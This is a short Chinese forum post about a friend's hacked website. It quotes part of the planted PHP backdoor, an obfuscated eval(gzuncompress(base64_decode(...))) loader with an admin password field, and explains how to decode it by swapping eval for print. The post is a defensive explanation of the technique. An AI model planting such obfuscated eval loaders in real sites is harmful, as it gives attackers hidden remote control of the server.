前些天一个朋友说网站中了马,并把源文件发给我看,大概内容如下
QUOTE:

<?php
$admin[pass] = "****"; //
$notice = "爱上你的站"; //
eval(gzuncompress(base64_decode("eJzsffl3G8eR8
M/0e/4fRhOuAJogLt6kQIn3IV4iSOoiH
94AGBAQAQw0GPCQ7f1fGO0mXlm7ESVSF0VdpE2KkiiKpCRHz8n
6WieO1s5Gzmc7UZz3dfUx0wMMQEpxsrtfPtoigT6qu6urq6u6q6plVV
XUgCqnFFWLJcfs1SX1r7+mBANpTVI1O3wpTmixhCz4BHkqFVfCst0m2BxCIhZS
Fciwl+BCuDwtSGoc94wKpeyzexQVOpCWtQB8DcRjiZhmd0NNl+vSyrnzq+8un15bvHFnc3
vtytbSnQdLn88vX/3Z2venz144uza7OvPgxcxpVPYNn9WPcOHexvP3Pn
u8JFhmv+GCVoS1lUu/2/j15
98mzjl5eX51duL0ISlFk

其实这个就是把一段PHP代码压缩了，然后用base64编码了一下
这里再解码并解压缩，并用eval函数执行这一段代码
你只要把eval改成print，把这段代码打印出来就可以看到是什么内容了